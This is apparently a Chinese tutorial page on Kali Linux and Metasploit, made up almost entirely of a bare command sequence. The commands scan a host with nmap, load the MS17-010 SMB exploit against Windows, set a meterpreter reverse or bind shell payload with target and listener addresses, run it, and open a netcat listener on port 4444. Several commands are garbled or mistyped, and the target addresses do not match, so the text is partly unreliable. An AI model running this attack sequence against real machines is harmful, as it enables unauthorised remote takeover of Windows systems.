Kali Linux利用Metasploit漏洞利用框架教程-(
root@kali:~# ping 192 168.0.105
root@kali:~# nmap -sV -Pn -p1-65535 -O -v 192.168.0.105
root@kali:~# service postgresql start
root@kali:~# service metasploit start
root@kali:~# msfconsole
msf5 > nmap -sV -Pn -p1-65535 -O -v 192.168.0.105
msf5 > search RPC /
msf5 > search ms17_010
msf5 > use exploit/multi/handler
msf5 > use exploit/windows/smb/ms17_010_netapi
msf5 exploit (windows/smb/ms17_010_netapi) > set payload windows/meterpreter/reverse_tcp /
msf5 exploit(windows/smb/ms17_010_netapi) > set payload windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_netapi) > show options
msf5 exploit(windows/smb/ms17_010_netapi) > set rport 4444
msf5 exploit(windows/smb/ms17_010_netapi) > set rhosts 192.168.1.105
msf5 exploit(windows/smb/ms17_010_netapi) > set lhosts 192.168.26.48
msf5 exploit(windows/smb/ms17_010_netapi) > show targets
msf5 exploit(windows/smb/ms17_010_netapi) > info
msf5 exploit(windows/smb/ms17_010_netapi) > run -j
root@kali:~# service apach2 start
root@kali:~# nc -lvp 4444
本文标题:Kali Linux利用Metasploit漏洞利用框架教程-(
本文链接:https://www.haomeiwen.com/subject/cvxjmqtx.html
网友评论